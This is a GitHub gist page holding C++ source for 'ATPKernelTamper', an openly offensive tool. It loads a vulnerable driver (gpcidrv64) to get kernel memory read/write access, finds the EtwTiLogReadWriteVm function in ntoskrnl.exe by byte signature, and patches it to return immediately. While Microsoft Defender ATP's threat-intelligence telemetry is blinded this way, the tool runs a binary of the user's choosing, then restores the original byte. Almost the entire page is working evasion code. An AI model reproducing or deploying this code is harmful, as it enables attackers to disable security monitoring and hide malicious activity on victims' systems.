/ATPKernelTamper.cpp Secret
Last active
August 14, 2022 22:39
Star
You must be signed in to star a gist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
unsigned char signature[] = { 0x41 ,0x83 ,0xf9 ,0x10 ,0xb8 ,0x00 ,0x00 ,0x0c ,0x00 ,0x41 ,0xb8 ,0x00 ,0x00 ,0x03 ,0x00 }; | |
int backoffset = 76; | |
SIZE_T searchlen = 0x1000000; | |
typedef struct _RTL_PROCESS_MODULE_INFORMATION | |
{ | |
HANDLE Section; | |
PVOID MappedBase; | |
PVOID ImageBase; | |
ULONG ImageSize; | |
ULONG Flags; | |
USHORT LoadOrderIndex; | |
USHORT InitOrderIndex; | |
USHORT LoadCount; | |
USHORT OffsetToFileName; | |
UCHAR FullPathName[256]; | |
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; | |
typedef struct _RTL_PROCESS_MODULES | |
{ | |
ULONG NumberOfModules; | |
RTL_PROCESS_MODULE_INFORMATION Modules[1]; | |
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; | |
BYTE patchFunction(LPVOID kernelbaseaddress, uintptr_t pml4,int offset, const char* function_name, BYTE value) | |
{ | |
BYTE bres; | |
BYTE bori; | |
BYTE patch = value; | |
uintptr_t size = 0; | |
uintptr_t p = (uintptr_t)kernelbaseaddress + offset; | |
printf("[+] %s address: %#x\n", function_name, p); | |
BOOL result = read_virtual_memory(ghDriver, pml4, p, &bres, 1); | |
if(!read_virtual_memory(ghDriver, pml4, p, &bori, 1)) | |
{ | |
return 0x0; | |
} | |
if (!write_virtual_memory(ghDriver, pml4, p, &patch, 1)) | |
{ | |
return 0x0; | |
} | |
if (read_virtual_memory(ghDriver, pml4, p, &bres, 1)) | |
{ | |
printf("[+] %s new value: %#x old value: %#x\n\n", function_name, bres, bori); | |
} | |
else | |
{ | |
return 0x0; | |
} | |
return bori; | |
} | |
BYTE patchFunction(LPVOID kernelbaseaddress, uintptr_t pml4, int offset, const char* function_name) | |
{ | |
return patchFunction(kernelbaseaddress, pml4, offset, function_name, 0xc3); | |
} | |
int main(int argc, char* argv[]) | |
{ | |
printf("====== ATPKernelTamper ======\n"); | |
if(argc != 2) | |
{ | |
printf("[-] Usage: ATPKernelTamper.exe binary\n"); | |
return 0; | |
} | |
if(!FileExists(argv[1])) | |
{ | |
printf("[-] Binary file not found\n"); | |
return 0; | |
} | |
so_check(); | |
printf("[+] Please make sure your version is detected correctly. Incorrect version detection will leads to BSOD.\n"); | |
printf("[+] Press any key to proceed.\n"); | |
getchar(); | |
VOID* buffer = malloc(searchlen); | |
if (!LoadDriver()) | |
{ | |
printf("[-] Could not load driver, maybe lack of permission?\n"); | |
return 0; | |
} | |
if (!InitDriver()) { | |
printf("[-] Could not get a handle to driver, is driver loaded?\n"); | |
Dl_UnloadDriver(L"gpcidrv64"); | |
Dl_RemoveDriverFromRegistry(L"gpcidrv64"); | |
return 0; | |
} | |
NTSTATUS status; | |
ULONG i; | |
PRTL_PROCESS_MODULES ModuleInfo; | |
ModuleInfo = (PRTL_PROCESS_MODULES)VirtualAlloc(NULL, 1024 * 1024, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // Allocate memory for the module list | |
if (!ModuleInfo) | |
{ | |
printf("\nUnable to allocate memory for module list (%d)\n", GetLastError()); | |
return -1; | |
} | |
if (!NT_SUCCESS(status = NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, 1024 * 1024, NULL))) | |
{ | |
printf("\nError: Unable to query module list (%#x)\n", status); | |
VirtualFree(ModuleInfo, 0, MEM_RELEASE); | |
return -1; | |
} | |
for (i = 0; i < ModuleInfo->NumberOfModules; i++) | |
{ | |
if (strcmp((char *)(ModuleInfo->Modules[i].FullPathName + ModuleInfo->Modules[i].OffsetToFileName), "ntoskrnl.exe") == 0) | |
{ | |
printf("[+] Kernel address: %#x\n", ModuleInfo->Modules[i].ImageBase); | |
uintptr_t pml4 = find_directory_base(ghDriver); | |
printf("\n"); | |
BOOL result = read_virtual_memory(ghDriver, pml4, (uintptr_t)ModuleInfo->Modules[i].ImageBase, buffer, searchlen); | |
if(result) | |
{ | |
DWORD offset = searchSign((unsigned char*)buffer, signature, sizeof(signature)); | |
free(buffer); | |
printf("[*] Offset %d\n", offset - backoffset); | |
BYTE EtwTiLogReadWriteVmOri = patchFunction(ModuleInfo->Modules[i].ImageBase, pml4, offset - backoffset, "EtwTiLogReadWriteVm"); | |
printf("[+] Run your command now\n"); | |
int retCode = system(argv[1]); | |
printf("\n\n"); | |
printf("[+] Execution finished with exit code: %d\n", retCode); | |
printf("[+] Proceed to restore previous state.\n"); | |
patchFunction(ModuleInfo->Modules[i].ImageBase, pml4, offset - backoffset, "EtwTiLogReadWriteVm", EtwTiLogReadWriteVmOri); | |
} | |
else | |
{ | |
printf("[*] Errore reading kernel memory \n"); | |
} | |
} | |
} | |
CloseHandle(ghDriver); | |
Dl_UnloadDriver(L"gpcidrv64"); | |
Dl_RemoveDriverFromRegistry(L"gpcidrv64"); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment